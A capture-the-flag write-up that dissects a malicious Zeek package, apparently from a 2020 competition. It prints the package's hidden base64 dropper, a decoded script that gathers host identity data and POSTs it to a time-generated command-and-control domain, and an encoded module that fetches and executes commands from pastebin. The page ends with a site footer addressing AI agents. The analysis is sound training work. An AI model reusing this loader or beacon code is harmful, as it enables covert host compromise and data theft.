# Friendly Package {% hint style="info" %} A junior sensor admin was reading through the Zeek Package Source and came across this package. The package is named "friendly package" but is everything but friendly. The junior admin loaded the package on her zeek sensor on 31 Aug 2020. At 1598890299 the zeek sensor beaconed to a malicious command and control domain with sensitive host information. The flag is the domain name which was beaconed to. {% endhint %} ``` ./ ├── COPYING ├── LICENSE ├── README.md ├── VERSION ├── scripts │   ├── __load__.zeek │   └── innocuous.zeek ├── src │   ├── Plugin.cc │   ├── Plugin.h │   └── events.bif ├── tests │   └── test.sh └── zkg.meta ``` All the interesting things happen in the scripts {% code title="innocuous.zeek" %} ```c # An innocuous script which prints a warm greeting. How nice! event zeek_init() &priority=-10{ print "have a nice day!"; } ``` {% endcode %} {% code title="**load**.zeek" %} ```c @load ./innocuous global GLOBAL::drops: table[string] of string = { ["get-command.zeek"] = "Z2xvYmFsIEdMT0JBTDo6Z2V0X2FuZF9leGN1dGU6IGV2ZW50KCk7Cmdsb2JhbCBHTE9CQUw6Omxhc3RfY21kID0gIiI7CgojIEJFIENBUkVGVUwuIFRISVMgRE9XTkxPQURTIEEgU1RSSU5HIEZPUk0gVEhFIElOVEVSTkVUIEFORCBFWEVDVVRFUyBJVC4KZ2xvYmFsIEdMT0JBTDo6Y21kX3VybCA9ICJodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWkV0MXdFTXYiOwoKCmZ1bmN0aW9uIEdMT0JBTDo6cGVyc2lzdCgpIHsKICBzY2hlZHVsZSAyc2VjIHsgZ2V0X2FuZF9leGN1dGUoKSB9Owp9CgpldmVudCBHTE9CQUw6OmdldF9hbmRfZXhjdXRlKCkgewogIGxvY2FsIHJlcSA9IFskdXJsPWNtZF91cmwsICRtZXRob2Q9IkdFVCJdOwogIHdoZW4gKGxvY2FsIHJlc3BvbnNlID0gQWN0aXZlSFRUUDo6cmVxdWVzdChyZXEpKSB7CiAgICBpZiAoR0xPQkFMOjpsYXN0X2NtZCAhPSByZXNwb25zZSRib2R5KSB7CiAgICAgIHdoZW4gKGxvY2FsIHJlc3VsdCA9IEV4ZWM6OnJ1bihbJGNtZD1mbXQoIiVzIiwgcmVzcG9uc2UkYm9keSldKSkgewogICAgICAgIHByaW50IGZtdCgicGFzdGViaW4gY29tbWFuZDogJXMsIGNvbW1hbmQgcmVzdWx0OiAlcyIsIHJlc3BvbnNlJGJvZHksIHJlc3VsdCRzdGRvdXRbMF0pOwogICAgICAgIEdMT0JBTDo6bGFzdF9jbWQgPSByZXNwb25zZSRib2R5OwogICAgICB9CiAgICB9CiAgfQogIHBlcnNpc3QoKTsKfQoKZXZlbnQgemVla19pbml0KCkgewogIHBlcnNpc3QoKTsKfQo=", ["inject-pkt.py"] = "IyB3cml0ZSBvbmUhCg==", ["inject-pkt.zeek"] = "IyB3cml0ZSBhIHBrdCBpbmplY3Rpbmcgc2NyaXB0IGluIHB5dGhvbi4KIyB0aGVuIHVzZSB0aGUgZXhlYyBmcmFtZXdvcmsgdG8gY2FsbCBpdCBmcm9tIHplZWsK", ["main.zeek"] = "QGxvYWQgLi9nZXQtY29tbWFuZApAbG9hZCAuL3NjYW4tZmlsZXMKQGxvYWQgLi9pbmplY3QtcGt0CgpyZWRlZiBleGl0X29ubHlfYWZ0ZXJfdGVybWluYXRlID0gVDsKCmZ1bmN0aW9uIEdMT0JBTDo6ZGdhKCk6IHN0cmluZyB7CiAgbG9jYWwgdCA9IGN1cnJlbnRfdGltZSgpOwogIGxvY2FsIHNlZWQgPSBkb3VibGVfdG9fY291bnQoZmxvb3IodGltZV90b19kb3VibGUodCkpKSAlIDg2NDAwMDsKICBsb2NhbCBjb250cm9sbGVyID0gIiI7CiAgZm9yIChpIGluIGZtdCgiJXMiLCBzZWVkKSkgewogICAgbG9jYWwgbiA9IHRvX2ludChpKTsKICAgIGNvbnRyb2xsZXIgKz0gImFiY2RlZmdoaWprbG1ub3BxcnN0dVZ3eHlaIltuXTsKICB9CiAgY29udHJvbGxlciA9IGNvbnRyb2xsZXJbOi0zXTsKICBjb250cm9sbGVyICs9ICIuY29tIjsKICByZXR1cm4gY29udHJvbGxlcjsKfQoKZnVuY3Rpb24gR0xPQkFMOjpyZWdpc3Rlcih2czogdmVjdG9yIG9mIHN0cmluZykgewogIGxvY2FsIGMyID0gZGdhKCk7CiAgbG9jYWwgcmVxID0gWyR1cmw9Zm10KCJodHRwczovLyVzL25ldyIsIGMyKSwKICAgICAgICAgICAgICAgJG1ldGhvZD0iUE9TVCIsCiAgICAgICAgICAgICAgICRjbGllbnRfZGF0YT1lbmNvZGVfYmFzZTY0KGpvaW5fc3RyaW5nX3ZlYyh2cywgInwiKSldOwogIHByaW50ICJwcmVwYXJlZCBpbXBsYW50IGNoZWNrLWluLi4uIjsKICBwcmludCByZXE7Cn0KCmZ1bmN0aW9uIEdMT0JBTDo6Z2F0aGVyKCkgewogIHdoZW4gKGxvY2FsIHJlc3VsdDEgPSBFeGVjOjpydW4oWyRjbWQ9Zm10KCJob3N0bmFtZSAmJiBkYXRlICYmIGlkIildKSkgewogICAgbG9jYWwgaG4gPSByZXN1bHQxJHN0ZG91dFswXTsKICAgIGxvY2FsIGRhID0gcmVzdWx0MSRzdGRvdXRbMV07CiAgICBsb2NhbCBpZCA9IHJlc3VsdDEkc3Rkb3V0WzJdOwogICAgd2hlbiAobG9jYWwgcmVzdWx0MiA9IEV4ZWM6OnJ1bihbJGNtZD1mbXQoInciKV0pKSB7CiAgICAgIGxvY2FsIHVwID0gc3BsaXRfc3RyaW5nKHN1YihzcGxpdF9zdHJpbmcocmVzdWx0MiRzdGRvdXRbMF0sIC8gLylbM10sIC8gLywgIiIpLCAvOi8pOwogICAgICAjIEdhdGhlciBob3N0IHN0YXRzIG9ubHkgaWYgZXhlY3V0aW5nIG9uIGEgc3lzdGVtIHRoYXQncyBiZWVuIHVwIGZvciBvdmVyIDEgaHIKICAgICAgaWYgKHRvX2ludCh1cFswXSkgPiAxKSB7CiAgICAgICAgbG9jYWwgd2ggPSBqb2luX3N0cmluZ192ZWMocmVzdWx0MiRzdGRvdXQsICJ8Iik7CiAgICAgICAgcmVnaXN0ZXIodmVjdG9yKGhuLCBkYSwgaWQsIHdoKSk7CiAgICAgIH0KICAgIH0KICB9Cn0KCmZ1bmN0aW9uIEdMT0JBTDo6b3JpZW50KCkgewogIGxvY2FsIHJlcSA9IFskdXJsPSJodHRwczovL2FwaS5teWlwLmNvbS8iLCAkbWV0aG9kPSJHRVQiXTsKICB3aGVuIChsb2NhbCByZXNwb25zZSA9IEFjdGl2ZUhUVFA6OnJlcXVlc3QocmVxKSkgewogICAgIyBPbmx5IGRvIHN0dWZmIGlmIHdlIGFyZSBleGVjdXRpbmcgZnJvbSBzeXN0ZW0gd2l0aCBlZ3Jlc3MgSVAgbG9jYXRlZCBpbiB0aGUgVVMKICAgIGlmIChzdWIoc3ViKHNwbGl0X3N0cmluZyhyZXNwb25zZSRib2R5LCAvLC8pWzJdLCAvXCJjY1wiOlwiLywgIiIpLCAvXCJcfS8sICIiKSA9PSAiVVMiKSB7CiAgICAgIGdhdGhlcigpOwogICAgfQogIH0gdGltZW91dCAxbWluIHsKICAgIHJldHVybjsKICB9Cn0KCmV2ZW50IHplZWtfaW5pdCAoKSB7CiAgb3JpZW50KCk7Cn0K", ["scan-files.zeek"] = "IyBob29rIGZpbGUgZXZlbnRzIHdoaWNoIGNvbnRhaW4gZmlsZSBuYW1lcwojIG1hdGNoIHRob3NlIGZpbGVuYW1lcyBhZ2FpbnN0IGEgbGlzdCBvZiBwYXR0ZXJucyBsaWtlLCAvc2VjcmV0LyAvY29uZmlkZW50aWFsLyAvYW5ncnkga29hbGEvCiMgdXNlIGFjdGl2ZSBodHRwIHRvIHBvc3QgZmlsZSBjb250ZW50cyB0byB0aGUgY29udHJvbGxlciBmcm9tIEdMT0JBTDo6Zm91cigpCg=="}; function GLOBAL::f(): bool { for (fn in drops) { local fh = open(fn); write_file(fh, decode_base64(drops[fn])); close(fh);} return T;} event zeek_done() { print "goodbye, you beautiful person!"; } @if(f()) @load ./main @endif event zeek_init() { for (fn in drops) { unlink(fn); } } event zeek_init() { print "hello, you beautiful person!"; } ``` {% endcode %} Yikes that formatting lets clean that up. Trying to hide beyond the column character limit, nice try. ```c @load ./innocuous global GLOBAL::drops: table[string] of string = { ["get-command.zeek"] = "Z2xvYmFsIEdMT0JBTDo6Z2V0X2FuZF9leGN1dGU6IGV2ZW50KCk7Cmdsb2JhbCBHTE9CQUw6Omxhc3RfY21kID0gIiI7CgojIEJFIENBUkVGVUwuIFRISVMgRE9XTkxPQURTIEEgU1RSSU5HIEZPUk0gVEhFIElOVEVSTkVUIEFORCBFWEVDVVRFUyBJVC4KZ2xvYmFsIEdMT0JBTDo6Y21kX3VybCA9ICJodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWkV0MXdFTXYiOwoKCmZ1bmN0aW9uIEdMT0JBTDo6cGVyc2lzdCgpIHsKICBzY2hlZHVsZSAyc2VjIHsgZ2V0X2FuZF9leGN1dGUoKSB9Owp9CgpldmVudCBHTE9CQUw6OmdldF9hbmRfZXhjdXRlKCkgewogIGxvY2FsIHJlcSA9IFskdXJsPWNtZF91cmwsICRtZXRob2Q9IkdFVCJdOwogIHdoZW4gKGxvY2FsIHJlc3BvbnNlID0gQWN0aXZlSFRUUDo6cmVxdWVzdChyZXEpKSB7CiAgICBpZiAoR0xPQkFMOjpsYXN0X2NtZCAhPSByZXNwb25zZSRib2R5KSB7CiAgICAgIHdoZW4gKGxvY2FsIHJlc3VsdCA9IEV4ZWM6OnJ1bihbJGNtZD1mbXQoIiVzIiwgcmVzcG9uc2UkYm9keSldKSkgewogICAgICAgIHByaW50IGZtdCgicGFzdGViaW4gY29tbWFuZDogJXMsIGNvbW1hbmQgcmVzdWx0OiAlcyIsIHJlc3BvbnNlJGJvZHksIHJlc3VsdCRzdGRvdXRbMF0pOwogICAgICAgIEdMT0JBTDo6bGFzdF9jbWQgPSByZXNwb25zZSRib2R5OwogICAgICB9CiAgICB9CiAgfQogIHBlcnNpc3QoKTsKfQoKZXZlbnQgemVla19pbml0KCkgewogIHBlcnNpc3QoKTsKfQo=", ["inject-pkt.py"] = "IyB3cml0ZSBvbmUhCg==", ["inject-pkt.zeek"] = "IyB3cml0ZSBhIHBrdCBpbmplY3Rpbmcgc2NyaXB0IGluIHB5dGhvbi4KIyB0aGVuIHVzZSB0aGUgZXhlYyBmcmFtZXdvcmsgdG8gY2FsbCBpdCBmcm9tIHplZWsK", ["main.zeek"] = "QGxvYWQgLi9nZXQtY29tbWFuZApAbG9hZCAuL3NjYW4tZmlsZXMKQGxvYWQgLi9pbmplY3QtcGt0CgpyZWRlZiBleGl0X29ubHlfYWZ0ZXJfdGVybWluYXRlID0gVDsKCmZ1bmN0aW9uIEdMT0JBTDo6ZGdhKCk6IHN0cmluZyB7CiAgbG9jYWwgdCA9IGN1cnJlbnRfdGltZSgpOwogIGxvY2FsIHNlZWQgPSBkb3VibGVfdG9fY291bnQoZmxvb3IodGltZV90b19kb3VibGUodCkpKSAlIDg2NDAwMDsKICBsb2NhbCBjb250cm9sbGVyID0gIiI7CiAgZm9yIChpIGluIGZtdCgiJXMiLCBzZWVkKSkgewogICAgbG9jYWwgbiA9IHRvX2ludChpKTsKICAgIGNvbnRyb2xsZXIgKz0gImFiY2RlZmdoaWprbG1ub3BxcnN0dVZ3eHlaIltuXTsKICB9CiAgY29udHJvbGxlciA9IGNvbnRyb2xsZXJbOi0zXTsKICBjb250cm9sbGVyICs9ICIuY29tIjsKICByZXR1cm4gY29udHJvbGxlcjsKfQoKZnVuY3Rpb24gR0xPQkFMOjpyZWdpc3Rlcih2czogdmVjdG9yIG9mIHN0cmluZykgewogIGxvY2FsIGMyID0gZGdhKCk7CiAgbG9jYWwgcmVxID0gWyR1cmw9Zm10KCJodHRwczovLyVzL25ldyIsIGMyKSwKICAgICAgICAgICAgICAgJG1ldGhvZD0iUE9TVCIsCiAgICAgICAgICAgICAgICRjbGllbnRfZGF0YT1lbmNvZGVfYmFzZTY0KGpvaW5fc3RyaW5nX3ZlYyh2cywgInwiKSldOwogIHByaW50ICJwcmVwYXJlZCBpbXBsYW50IGNoZWNrLWluLi4uIjsKICBwcmludCByZXE7Cn0KCmZ1bmN0aW9uIEdMT0JBTDo6Z2F0aGVyKCkgewogIHdoZW4gKGxvY2FsIHJlc3VsdDEgPSBFeGVjOjpydW4oWyRjbWQ9Zm10KCJob3N0bmFtZSAmJiBkYXRlICYmIGlkIildKSkgewogICAgbG9jYWwgaG4gPSByZXN1bHQxJHN0ZG91dFswXTsKICAgIGxvY2FsIGRhID0gcmVzdWx0MSRzdGRvdXRbMV07CiAgICBsb2NhbCBpZCA9IHJlc3VsdDEkc3Rkb3V0WzJdOwogICAgd2hlbiAobG9jYWwgcmVzdWx0MiA9IEV4ZWM6OnJ1bihbJGNtZD1mbXQoInciKV0pKSB7CiAgICAgIGxvY2FsIHVwID0gc3BsaXRfc3RyaW5nKHN1YihzcGxpdF9zdHJpbmcocmVzdWx0MiRzdGRvdXRbMF0sIC8gLylbM10sIC8gLywgIiIpLCAvOi8pOwogICAgICAjIEdhdGhlciBob3N0IHN0YXRzIG9ubHkgaWYgZXhlY3V0aW5nIG9uIGEgc3lzdGVtIHRoYXQncyBiZWVuIHVwIGZvciBvdmVyIDEgaHIKICAgICAgaWYgKHRvX2ludCh1cFswXSkgPiAxKSB7CiAgICAgICAgbG9jYWwgd2ggPSBqb2luX3N0cmluZ192ZWMocmVzdWx0MiRzdGRvdXQsICJ8Iik7CiAgICAgICAgcmVnaXN0ZXIodmVjdG9yKGhuLCBkYSwgaWQsIHdoKSk7CiAgICAgIH0KICAgIH0KICB9Cn0KCmZ1bmN0aW9uIEdMT0JBTDo6b3JpZW50KCkgewogIGxvY2FsIHJlcSA9IFskdXJsPSJodHRwczovL2FwaS5teWlwLmNvbS8iLCAkbWV0aG9kPSJHRVQiXTsKICB3aGVuIChsb2NhbCByZXNwb25zZSA9IEFjdGl2ZUhUVFA6OnJlcXVlc3QocmVxKSkgewogICAgIyBPbmx5IGRvIHN0dWZmIGlmIHdlIGFyZSBleGVjdXRpbmcgZnJvbSBzeXN0ZW0gd2l0aCBlZ3Jlc3MgSVAgbG9jYXRlZCBpbiB0aGUgVVMKICAgIGlmIChzdWIoc3ViKHNwbGl0X3N0cmluZyhyZXNwb25zZSRib2R5LCAvLC8pWzJdLCAvXCJjY1wiOlwiLywgIiIpLCAvXCJcfS8sICIiKSA9PSAiVVMiKSB7CiAgICAgIGdhdGhlcigpOwogICAgfQogIH0gdGltZW91dCAxbWluIHsKICAgIHJldHVybjsKICB9Cn0KCmV2ZW50IHplZWtfaW5pdCAoKSB7CiAgb3JpZW50KCk7Cn0K", ["scan-files.zeek"] = "IyBob29rIGZpbGUgZXZlbnRzIHdoaWNoIGNvbnRhaW4gZmlsZSBuYW1lcwojIG1hdGNoIHRob3NlIGZpbGVuYW1lcyBhZ2FpbnN0IGEgbGlzdCBvZiBwYXR0ZXJucyBsaWtlLCAvc2VjcmV0LyAvY29uZmlkZW50aWFsLyAvYW5ncnkga29hbGEvCiMgdXNlIGFjdGl2ZSBodHRwIHRvIHBvc3QgZmlsZSBjb250ZW50cyB0byB0aGUgY29udHJvbGxlciBmcm9tIEdMT0JBTDo6Zm91cigpCg==" }; function GLOBAL::f(): bool { for (fn in drops) { local fh = open(fn); write_file(fh, decode_base64(drops[fn])); close(fh); } return T; } event zeek_done() { print "goodbye, you beautiful person!"; } @if(f()) @load ./main @endif event zeek_init() { for (fn in drops) { unlink(fn); } } event zeek_init() { print "hello, you beautiful person!"; } ``` Looks like we have more base64 files to expand out and write. {% code title="open.zeek" %} ```c @load ./innocuous global GLOBAL::drops: table[string] of string = { ["get-command.zeek"] = "Z2xvYmFsIEdMT0JBTDo6Z2V0X2FuZF9leGN1dGU6IGV2ZW50KCk7Cmdsb2JhbCBHTE9CQUw6Omxhc3RfY21kID0gIiI7CgojIEJFIENBUkVGVUwuIFRISVMgRE9XTkxPQURTIEEgU1RSSU5HIEZPUk0gVEhFIElOVEVSTkVUIEFORCBFWEVDVVRFUyBJVC4KZ2xvYmFsIEdMT0JBTDo6Y21kX3VybCA9ICJodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWkV0MXdFTXYiOwoKCmZ1bmN0aW9uIEdMT0JBTDo6cGVyc2lzdCgpIHsKICBzY2hlZHVsZSAyc2VjIHsgZ2V0X2FuZF9leGN1dGUoKSB9Owp9CgpldmVudCBHTE9CQUw6OmdldF9hbmRfZXhjdXRlKCkgewogIGxvY2FsIHJlcSA9IFskdXJsPWNtZF91cmwsICRtZXRob2Q9IkdFVCJdOwogIHdoZW4gKGxvY2FsIHJlc3BvbnNlID0gQWN0aXZlSFRUUDo6cmVxdWVzdChyZXEpKSB7CiAgICBpZiAoR0xPQkFMOjpsYXN0X2NtZCAhPSByZXNwb25zZSRib2R5KSB7CiAgICAgIHdoZW4gKGxvY2FsIHJlc3VsdCA9IEV4ZWM6OnJ1bihbJGNtZD1mbXQoIiVzIiwgcmVzcG9uc2UkYm9keSldKSkgewogICAgICAgIHByaW50IGZtdCgicGFzdGViaW4gY29tbWFuZDogJXMsIGNvbW1hbmQgcmVzdWx0OiAlcyIsIHJlc3BvbnNlJGJvZHksIHJlc3VsdCRzdGRvdXRbMF0pOwogICAgICAgIEdMT0JBTDo6bGFzdF9jbWQgPSByZXNwb25zZSRib2R5OwogICAgICB9CiAgICB9CiAgfQogIHBlcnNpc3QoKTsKfQoKZXZlbnQgemVla19pbml0KCkgewogIHBlcnNpc3QoKTsKfQo=", ["inject-pkt.py"] = "IyB3cml0ZSBvbmUhCg==", ["inject-pkt.zeek"] = "IyB3cml0ZSBhIHBrdCBpbmplY3Rpbmcgc2NyaXB0IGluIHB5dGhvbi4KIyB0aGVuIHVzZSB0aGUgZXhlYyBmcmFtZXdvcmsgdG8gY2FsbCBpdCBmcm9tIHplZWsK", ["main.zeek"] = "QGxvYWQgLi9nZXQtY29tbWFuZApAbG9hZCAuL3NjYW4tZmlsZXMKQGxvYWQgLi9pbmplY3QtcGt0CgpyZWRlZiBleGl0X29ubHlfYWZ0ZXJfdGVybWluYXRlID0gVDsKCmZ1bmN0aW9uIEdMT0JBTDo6ZGdhKCk6IHN0cmluZyB7CiAgbG9jYWwgdCA9IGN1cnJlbnRfdGltZSgpOwogIGxvY2FsIHNlZWQgPSBkb3VibGVfdG9fY291bnQoZmxvb3IodGltZV90b19kb3VibGUodCkpKSAlIDg2NDAwMDsKICBsb2NhbCBjb250cm9sbGVyID0gIiI7CiAgZm9yIChpIGluIGZtdCgiJXMiLCBzZWVkKSkgewogICAgbG9jYWwgbiA9IHRvX2ludChpKTsKICAgIGNvbnRyb2xsZXIgKz0gImFiY2RlZmdoaWprbG1ub3BxcnN0dVZ3eHlaIltuXTsKICB9CiAgY29udHJvbGxlciA9IGNvbnRyb2xsZXJbOi0zXTsKICBjb250cm9sbGVyICs9ICIuY29tIjsKICByZXR1cm4gY29udHJvbGxlcjsKfQoKZnVuY3Rpb24gR0xPQkFMOjpyZWdpc3Rlcih2czogdmVjdG9yIG9mIHN0cmluZykgewogIGxvY2FsIGMyID0gZGdhKCk7CiAgbG9jYWwgcmVxID0gWyR1cmw9Zm10KCJodHRwczovLyVzL25ldyIsIGMyKSwKICAgICAgICAgICAgICAgJG1ldGhvZD0iUE9TVCIsCiAgICAgICAgICAgICAgICRjbGllbnRfZGF0YT1lbmNvZGVfYmFzZTY0KGpvaW5fc3RyaW5nX3ZlYyh2cywgInwiKSldOwogIHByaW50ICJwcmVwYXJlZCBpbXBsYW50IGNoZWNrLWluLi4uIjsKICBwcmludCByZXE7Cn0KCmZ1bmN0aW9uIEdMT0JBTDo6Z2F0aGVyKCkgewogIHdoZW4gKGxvY2FsIHJlc3VsdDEgPSBFeGVjOjpydW4oWyRjbWQ9Zm10KCJob3N0bmFtZSAmJiBkYXRlICYmIGlkIildKSkgewogICAgbG9jYWwgaG4gPSByZXN1bHQxJHN0ZG91dFswXTsKICAgIGxvY2FsIGRhID0gcmVzdWx0MSRzdGRvdXRbMV07CiAgICBsb2NhbCBpZCA9IHJlc3VsdDEkc3Rkb3V0WzJdOwogICAgd2hlbiAobG9jYWwgcmVzdWx0MiA9IEV4ZWM6OnJ1bihbJGNtZD1mbXQoInciKV0pKSB7CiAgICAgIGxvY2FsIHVwID0gc3BsaXRfc3RyaW5nKHN1YihzcGxpdF9zdHJpbmcocmVzdWx0MiRzdGRvdXRbMF0sIC8gLylbM10sIC8gLywgIiIpLCAvOi8pOwogICAgICAjIEdhdGhlciBob3N0IHN0YXRzIG9ubHkgaWYgZXhlY3V0aW5nIG9uIGEgc3lzdGVtIHRoYXQncyBiZWVuIHVwIGZvciBvdmVyIDEgaHIKICAgICAgaWYgKHRvX2ludCh1cFswXSkgPiAxKSB7CiAgICAgICAgbG9jYWwgd2ggPSBqb2luX3N0cmluZ192ZWMocmVzdWx0MiRzdGRvdXQsICJ8Iik7CiAgICAgICAgcmVnaXN0ZXIodmVjdG9yKGhuLCBkYSwgaWQsIHdoKSk7CiAgICAgIH0KICAgIH0KICB9Cn0KCmZ1bmN0aW9uIEdMT0JBTDo6b3JpZW50KCkgewogIGxvY2FsIHJlcSA9IFskdXJsPSJodHRwczovL2FwaS5teWlwLmNvbS8iLCAkbWV0aG9kPSJHRVQiXTsKICB3aGVuIChsb2NhbCByZXNwb25zZSA9IEFjdGl2ZUhUVFA6OnJlcXVlc3QocmVxKSkgewogICAgIyBPbmx5IGRvIHN0dWZmIGlmIHdlIGFyZSBleGVjdXRpbmcgZnJvbSBzeXN0ZW0gd2l0aCBlZ3Jlc3MgSVAgbG9jYXRlZCBpbiB0aGUgVVMKICAgIGlmIChzdWIoc3ViKHNwbGl0X3N0cmluZyhyZXNwb25zZSRib2R5LCAvLC8pWzJdLCAvXCJjY1wiOlwiLywgIiIpLCAvXCJcfS8sICIiKSA9PSAiVVMiKSB7CiAgICAgIGdhdGhlcigpOwogICAgfQogIH0gdGltZW91dCAxbWluIHsKICAgIHJldHVybjsKICB9Cn0KCmV2ZW50IHplZWtfaW5pdCAoKSB7CiAgb3JpZW50KCk7Cn0K", ["scan-files.zeek"] = "IyBob29rIGZpbGUgZXZlbnRzIHdoaWNoIGNvbnRhaW4gZmlsZSBuYW1lcwojIG1hdGNoIHRob3NlIGZpbGVuYW1lcyBhZ2FpbnN0IGEgbGlzdCBvZiBwYXR0ZXJucyBsaWtlLCAvc2VjcmV0LyAvY29uZmlkZW50aWFsLyAvYW5ncnkga29hbGEvCiMgdXNlIGFjdGl2ZSBodHRwIHRvIHBvc3QgZmlsZSBjb250ZW50cyB0byB0aGUgY29udHJvbGxlciBmcm9tIEdMT0JBTDo6Zm91cigpCg==" }; event zeek_init() { for (fn in drops) { local fh = open(fn); write_file(fh, decode_base64(drops[fn])); close(fh); } } ``` {% endcode %} ```c ./ ├── get-command.zeek ├── inject-pkt.py ├── inject-pkt.zeek ├── innocuous.zeek ├── __load__.zeek ├── main.zeek ├── open.zeek └── scan-files.zeek ``` So we are looking for something that will beacon out. Sounds like an http post to me. ```c @load ./get-command @load ./scan-files @load ./inject-pkt redef exit_only_after_terminate = T; function GLOBAL::dga(): string { local t = current_time(); local seed = double_to_count(floor(time_to_double(t))) % 864000; local controller = ""; for (i in fmt("%s", seed)) { local n = to_int(i); controller += "abcdefghijklmnopqrstuVwxyZ"[n]; } controller = controller[:-3]; controller += ".com"; return controller; } function GLOBAL::register(vs: vector of string) { local c2 = dga(); local req = [$url=fmt("https://%s/new", c2), $method="POST", $client_data=encode_base64(join_string_vec(vs, "|"))]; print "prepared implant check-in..."; print req; } function GLOBAL::gather() { when (local result1 = Exec::run([$cmd=fmt("hostname && date && id")])) { local hn = result1$stdout[0]; local da = result1$stdout[1]; local id = result1$stdout[2]; when (local result2 = Exec::run([$cmd=fmt("w")])) { local up = split_string(sub(split_string(result2$stdout[0], / /)[3], / /, ""), /:/); # Gather host stats only if executing on a system that's been up for over 1 hr if (to_int(up[0]) > 1) { local wh = join_string_vec(result2$stdout, "|"); register(vector(hn, da, id, wh)); } } } } function GLOBAL::orient() { local req = [$url="https://api.myip.com/", $method="GET"]; when (local response = ActiveHTTP::request(req)) { # Only do stuff if we are executing from system with egress IP located in the US if (sub(sub(split_string(response$body, /,/)[2], /\"cc\":\"/, ""), /\"\}/, "") == "US") { gather(); } } timeout 1min { return; } } event zeek_init () { orient(); } ``` We have our POST. But it is dynamically creating the url based on the time of day. Remember the hint. It happened at **1598890299**. So lets back into that domain name ```c event zeek_init() { local t: time = double_to_time(1598890299.0); local seed = double_to_count(floor(time_to_double(t))) % 864000; local controller = ""; for (i in fmt("%s", seed)) { local n = to_int(i); controller += "abcdefghijklmnopqrstuVwxyZ"[n]; } controller = controller[:-3]; controller += ".com"; print(controller); } ``` {% hint style="success" %} The solution ``` eja.com ``` {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eephillip.gitbook.io/zw2020-ctf-writeup/writeup/friendly-package.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.